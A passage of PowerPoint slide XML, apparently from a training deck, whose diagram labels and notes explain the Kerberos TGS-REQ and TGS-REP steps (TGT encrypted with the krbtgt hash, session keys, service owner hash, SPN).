              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>TGT</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="TextBox 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD5C5571-EA33-46DD-9CD9-582F0D8444AA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4457511" y="2982230"/>
                <a:ext cx="2965383" cy="338554"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Encrypted with </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>krbtgt</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> Hash</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="Group 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D142CB6D-353B-46D6-BDB6-BC7678230D37}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4733286" y="2455470"/>
              <a:ext cx="2725426" cy="1139432"/>
              <a:chOff x="4567230" y="1822241"/>
              <a:chExt cx="2725426" cy="1139432"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="TextBox 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A48F282D-6A19-4C96-AB04-4F648DED3A50}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4669966" y="1822241"/>
                <a:ext cx="2528419" cy="830997"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Username</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Timestamp</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="TextBox 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98F812B6-2673-4878-9541-0B5F82E6EF8C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4567230" y="2623119"/>
                <a:ext cx="2725426" cy="338554"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Encrypted with Session Key</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{769B0D09-03D6-4BB1-ADF8-378415F265B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4586802" y="4394701"/>
              <a:ext cx="3124573" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Requested SPN</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80B10E4C-B1C4-49D4-963D-CA26D1FBD78A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="4877051"/>
            <a:ext cx="11338560" cy="1455630"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>KDC decrypts the TGT using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> password – obtains the session key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TGS-REQ decrypted using the session key, checks for validity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2828959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A0CD6-938D-48FA-B700-88D60ADA5280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>276</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F795ED5-5958-4AEA-B4A2-5DBC95AAE69B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 4 – TGS-REP (Ticket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Graning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Service Response)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FC4B06A-B102-4C8E-B232-06BF4055670C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="322765" y="1357909"/>
            <a:ext cx="11445563" cy="3280870"/>
            <a:chOff x="322765" y="1748434"/>
            <a:chExt cx="11445563" cy="3280870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Arrow: Right 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D810250C-9DE1-483A-8B02-7F4E15E8EF42}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2628049" y="3141775"/>
              <a:ext cx="6877901" cy="1005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E536C8-1B90-4D0F-BE91-7301CD7B674C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5216592" y="1748434"/>
              <a:ext cx="2008883" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>TGS-REP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="Group 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45C35598-BEBC-4EEF-BAD0-69C2C5A0890E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="322765" y="2539262"/>
              <a:ext cx="2246768" cy="2332493"/>
              <a:chOff x="563984" y="2305616"/>
              <a:chExt cx="2246768" cy="2332493"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Graphic 5" descr="Monitor with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76019EE1-A747-4E35-91AE-62AD8BEF5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984" y="2305616"/>
                <a:ext cx="2246768" cy="2246768"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="TextBox 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0448280D-0A73-4959-990C-3326068B605E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1300082" y="4268777"/>
                <a:ext cx="774571" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Client</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="17" name="Group 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F70B42-CD94-42DA-8700-543EF2A1D6C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9524344" y="2465846"/>
              <a:ext cx="2243984" cy="2405909"/>
              <a:chOff x="9452716" y="2308400"/>
              <a:chExt cx="2243984" cy="2405909"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="Graphic 6" descr="Server with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F881537-E5A7-499B-B350-810C3B367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716" y="2308400"/>
                <a:ext cx="2243984" cy="2243984"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="TextBox 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F3200B4-E405-491A-968E-C77D3C38FF09}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10238718" y="4344977"/>
                <a:ext cx="671979" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>KDC</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp useBgFill="1">
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8B19C5E-11F8-4F60-A727-E21BCB67BF5B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3460380" y="2320789"/>
              <a:ext cx="5569320" cy="2708411"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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5EDCE6-C4E6-4B97-BC52-45387AFFA1D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6392580" y="3242244"/>
              <a:ext cx="2528419" cy="1787060"/>
              <a:chOff x="4669966" y="1822241"/>
              <a:chExt cx="2528419" cy="1787060"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="TextBox 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E64E1628-D8F6-4377-968C-967AE47DEA5E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4669966" y="1822241"/>
                <a:ext cx="2528419" cy="1077218"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Service Session Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>TGS Expiration Time</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Username</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="TextBox 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD5C5571-EA33-46DD-9CD9-582F0D8444AA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4787753" y="2962970"/>
                <a:ext cx="2300631" cy="646331"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Encrypted with </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Service Owner Hash</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="Group 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D142CB6D-353B-46D6-BDB6-BC7678230D37}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3599099" y="3237199"/>
              <a:ext cx="2528419" cy="1781722"/>
              <a:chOff x="4669966" y="1822241"/>
              <a:chExt cx="2528419" cy="1781722"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="TextBox 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A48F282D-6A19-4C96-AB04-4F648DED3A50}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4669966" y="1822241"/>
                <a:ext cx="2528419" cy="1077218"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Service Session Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>TGS Expiration Time</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>User Nonce</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="TextBox 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98F812B6-2673-4878-9541-0B5F82E6EF8C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5053164" y="2957632"/>
                <a:ext cx="1762021" cy="646331"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Encrypted with </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Session Key</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B75B53C-1AEB-4AF0-94FF-140B1EDD986D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7327211" y="2906781"/>
              <a:ext cx="659155" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>TGS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="TextBox 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{197FA5DB-4B4C-4025-AE2F-DD7832E08DC3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3821074" y="2585807"/>
              <a:ext cx="2074607" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Username</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{864105E5-D40C-4230-B87D-5FDF288C3CEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="4877051"/>
            <a:ext cx="11338560" cy="1455630"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
